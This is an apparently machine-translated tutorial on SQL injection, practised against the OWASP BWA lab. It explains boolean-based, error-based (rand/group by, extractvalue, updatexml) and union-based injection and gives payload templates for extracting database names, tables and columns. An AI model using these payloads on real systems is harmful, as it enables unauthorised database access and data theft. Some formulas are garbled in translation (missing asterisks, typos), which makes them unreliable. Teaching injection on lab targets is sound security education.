SQL Injection (literacy) and SQL Injection

SQL Injection (literacy) and SQL Injection

SQL injection is one of the most common methods of network attacks. It does not use Operating System bugs to launch attacks, but is aimed at the negligence of programmers during programming. through SQL statements, you can log on without an account, or even tamper with the database. The following is an in-depth introduction to SQL injection. If you are interested, let's take a look.

General idea of SQL injection attacks

1. Find the SQL Injection Location

2. Determine the server type and backend database type

3. SQL injection attacks against inaccessible servers and databases

SQL Injection (SQL Injection)

SQL Injection refers to inserting malicious SQL commands into a Web form for the server to execute, which can finally fool the server or database to execute malicious SQL commands.

To learn about SQL injection, first set up a target environment. I use owasp bwa. If you are interested, you can download an installation package from the official website, except for SQL injection, many target environments can be found in BWA, which is specially designed for owasp zap penetration tool.

$id = $_GET['id'];$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );$num = mysql_numrows($result);

This is a very simple PHP code. It obtains the id value from the front-end and submits it to the database for execution. The result is returned to the front-end.

For example, Enter id = 1 in OWASP and click Submit. The returned result is as follows:

Anyone who knows a little about the background or database knows that the code above has serious problems and does not judge the validity and validity of the id value. That is to say, all the input content in the submit input box will be submitted to the database for execution. For example, if you enter 1 'or '1' = '1 in the input box, the execution will become:

// SELECT first_name, last_name FROM users WHERE user_id = '1' command to be executed in the database, last_name FROM users WHERE user_id = '1' or '1' = '1'

Note that single quotes are a very important part of SQL injection. Therefore, add '1' = '1 at the end of the injection code to close single quotes.

The execution of or will display all the content in the database table users,

The following describes three main injection types.

Boolean-based principle analysis

First, you have to talk about and or in SQL.

And or can combine two OR more conditions in the WHERE substatement.

AND: returns the record with the first AND second conditions.

OR: returns a record that meets the first OR second condition.

And or are the intersection AND union in the set theory.

The following is the query content of a database.

mysql> select * from students;+-------+-------+-----+| id | name | age |+-------+-------+-----+| 10056 | Doris | 20 || 10058 | Jaune | 22 || 10060 | Alisa | 29 |+-------+-------+-----+3 rows in set (0.00 sec)

1)

mysql> select * from students where TRUE ;+-------+-------+-----+| id | name | age |+-------+-------+-----+| 10056 | Doris | 20 || 10058 | Jaune | 22 || 10060 | Alisa | 29 |+-------+-------+-----+3 rows in set (0.00 sec)

2)

mysql> select * from students where FALSE ;Empty set (0.00 sec)

3)

mysql> SELECT * from students where id = 10056 and TRUE ;+-------+-------+-----+| id | name | age |+-------+-------+-----+| 10056 | Doris | 20 |+-------+-------+-----+1 row in set (0.00 sec)

4)

mysql> select * from students where id = 10056 and FALSE ;Empty set (0.00 sec)

5)

mysql> selcet * from students where id = 10056 or TRUE ;+-------+-------+-----+| id | name | age |+-------+-------+-----+| 10056 | Doris | 20 || 10058 | Jaune | 22 || 10060 | Alisa | 29 |+-------+-------+-----+3 rows in set (0.00 sec)

6)

mysql> select * from students where id = 10056 or FALSE ;+-------+-------+-----+| id | name | age |+-------+-------+-----+| 10056 | Doris | 20 |+-------+-------+-----+1 row in set (0.00 sec)

And 1 = 1, and 1 = 2 is the variant of and TRUE, and FALSE.

This is the most basic boolean injection. Based on this, you can freely combine statements.

Dictionary brute-force stream

And exists (select * from ?) //? For the table name and exists (select? From x )//? Name of the column to be guessed

Intercept second shunting

And (length (select schema_name from information_schema.schemata limit 1)> ?) // Determine the length of the Database Name and (substr (select schema_name from information_schema.schemata limit 1), 1, 1)> '? ') And (substr (select schema_name from information_schema.schemata limit 1), 1, 1) <'? ') // Determine the first character using the bipartite Method

Boolean-based summary

According to the previous introduction, we know that for Boolean-based injection, a normal access address is required, suchhttp: //redtiger.labs.overthewire.org/level4.php?id=1It is a record that can be accessed normally, indicating that the id = 1 record exists. The following are based on this further speculation. First, judge the length of a key word and construct it later.id=1 and (select length(keyword) from table)=1From the server, we will get a return value. If it is different from the previous return value, it indicates(select length(keyword) from table)=1Returns false. The keyword length is not equal to 1. Continue constructionid=1 and (select length(keyword) from table)=15Returns true, indicating that the keyword length is 15.

Why do we need to find an existing id at the beginning? In fact, this is mainly to construct a true situation. Boolean-based uses different responses when the query result is true or false to find what you want.

For keyword values, mysql Databases can usesubstr(string, start, length)Function to intercept the length string starting from the start position.id=1 and (select substr(keyword,1,1) from table) ='A', And so on, you can obtain the value of keyword in the database.

The efficiency of Boolean-based is very low, and multiple requests are required to determine a value. Although this price can be achieved through a script, other methods are preferred when selected.

Error Based Principle Analysis

Error echo

Error echo-based SQL injection means that data is displayed to the page through the contradiction of SQL statements.

Functions used

count() Count the number of ancestor (equivalent to sum)

For exampleselect count(*) from information_schema.tables; 

rand()Used to generate a 0 ~ Random Number of 1

floor()Round down

Group by groups results based on the rules we want

Concat concatenates data from different rows in the same column that meet the conditions, separated by commas

SQL statement used for error echo

First: Based onrand() Andgroup by Error

Exploitationgroup by part of rand() returns duplicate key errorThis bug, aboutrand()Functions andgroup by The error reports in mysql are as follows:

RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.

This bug will expose the duplicate key error and steal the data by the way.

Formula:Username = admin' and (select 1 from (select count (), concat (floor (rand (0) 2), 0x23, (SQL statement of the data you want to obtain) x from information_schema.tables group by x) a) and '1' = '1

Type 2: XPATH Burst information

Here we mainly useExtractValue()AndUpdateXML()Because mysql 5.1 and later provide built-in XML file parsing and functions, these two functions can only be used in Versions later than mysql 5.1.

View SQL Manual

Syntax:EXTRACTVALUE (XML_document, XPath_string);

The first parameter: XML_document is in String format and is the name of the XML document object. The parameter is Doc.

The second parameter is XPath_string (a string in the Xpath format). If you do not know the Xpath syntax, you can find the tutorial online.

Purpose: return the string containing the queried value from the target XML.

Syntax:UPDATEXML (XML_document, XPath_string, new_value);


The first parameter: XML_document is in String format and is the name of the XML document object. The parameter is Doc.

The second parameter is XPath_string (a string in the Xpath format). If you do not know the Xpath syntax, you can find the tutorial online.

The third parameter: new_value, String format, replace the searched data that meets the condition

Purpose: change the value of a qualified node in the document.

Now it is clear that we only need to ignore XPath_string (Xpath format), but this method can only contain 32 bits, so we can use it in combination with mid.

Formula 1:Username = admin' and (extractvalue (1, concat (0x7e, (SQL statement of the data you want to obtain) and '1' = '1


Formula 2:Username = admin' and (updatexml (1, concat (0x7e, (SQL statement of the data you want to obtain), 1) and '1' = '1

Based on the injection of error ECHO, the SQL statement is used to display the data back to the page, but sometimes it is limited to only one echo, the efficiency of data theft based on incorrect injection is not that high, but it has improved to a higher level than Boolean injection.

Union query injection

To understand the union query injection, you must first understand the union query. union is used to merge two or more select result sets. For example

SELECT username, password FROM account;

The result is

Administrator 123456

SELECT id, title FROM article

The result is

1 Hello, World

SELECT username, password FROM accountUNION SELECT id, title FROM article

The result is

Administrator 123456

1 Hello, World

Compared with multiple nested boolean injection, union injection is relatively easy. Because union injection can directly return information rather than Boolean values. As described in the previous section, union puts the results together. All queries prior to union return a null value, which is generally similar to id =-1.

1)

Mysql> select name from students where id =-1 union select schema_name from information_schema.schemata; // database name + rule + | name | + ------------------ + | information_schema | mysql | performance_schema | rumRaisin | t3st | test | + -------------------- + 6 rows in set (0.00 sec)

2)

Mysql> select name from students where id =-1 union select table_name from information_schema.tables where table_schema = 't3st '; // table name + ---------- + | name | + ---------- + | master | students | + ---------- + 2 rows in set (0.00 sec)

3)

Mysql> select name from students where id =-1 union select column_name from information_schema.columns where table_name = 'students '; // column name + ------ + | name | + ------ + | id | name | age | + ------ + 3 rows in set (0.00 sec)

The UNION operator is used to merge the result sets of two or more SELECT statements. Note that the SELECT statement inside the UNION must have the same number of columns. Columns must also have similar data types. In addition, the columns in each SELECT statement must be in the same order.

For example, based on the initial OWASP, the two values first_name and sur_name are returned. It is conceivable that when the server returns the database query results, the first and second values in the result will be passed to first_name and sur_name. If there is more or less, an error will be reported.

If you want to use union queries for injection, you must first guess the number of columns queried in the backend query statement and which columns can be displayed to the user.

Number of prediction Columns

-1 union select 1-1 union select 1, 2-1 union select 1, 2, 3 // until the page is displayed normally

For example, this statement

-1 UNION SELECT 1,2,3,4

If the displayed values are 3 and 4, the query results contain four columns, and the third and fourth columns are useful. The corresponding union statement is as follows:

-1 UNION SELECT 1,2,username,password FROM table

Summary

There are about five types of SQL injection, and two other types are Stacked_queries (based on Stack) and Time-based blind (Time Delay). The stack is multi-statement query, '; 'separate the statements, just like union. Time delay means that the sleep () function is used to delay the execution of the database and data theft is slow. (There is also the sixth method: inline injection, but it overlaps with the previous content and will not be discussed separately)

Reference: I used to explore SQL injection at 1.1 points. Most of the content of this blog is from the company's internal server (the company regularly assesses, see what you have done ). At that time, no reference was made because of the Intranet. It is also very difficult to find these cited articles. Sorry.

Well, the above is all about this article. I hope this article will help you in your study or work. If you have any questions, please leave a message.